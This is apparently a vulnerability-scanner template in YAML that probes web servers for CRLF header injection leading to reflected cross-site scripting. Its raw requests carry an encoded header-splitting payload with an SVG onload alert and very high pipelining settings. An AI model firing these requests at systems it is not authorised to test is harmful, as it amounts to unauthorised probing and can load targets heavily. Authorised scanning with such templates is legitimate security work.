id: XSS_CRLF_Injection

info:
  name: XSS_CRLF_Injection
  author: 51pwn
  severity: critical
  reference:
    - https://hackerone.com/reports/192749
    - https://51pwn.com
  tags: xss,crlf,injection

requests:
  - raw:
      - |+
        GET /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Pragma:no-cache
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        
      - |+
        GET /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        
      # end payload
    unsafe: true
    pipeline: true
    pipeline-concurrent-connections: 40
    pipeline-requests-per-connection: 25000
    cookie-reuse: true
    req-condition: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - '<svg onload=alert(document.domain)>'
        condition: and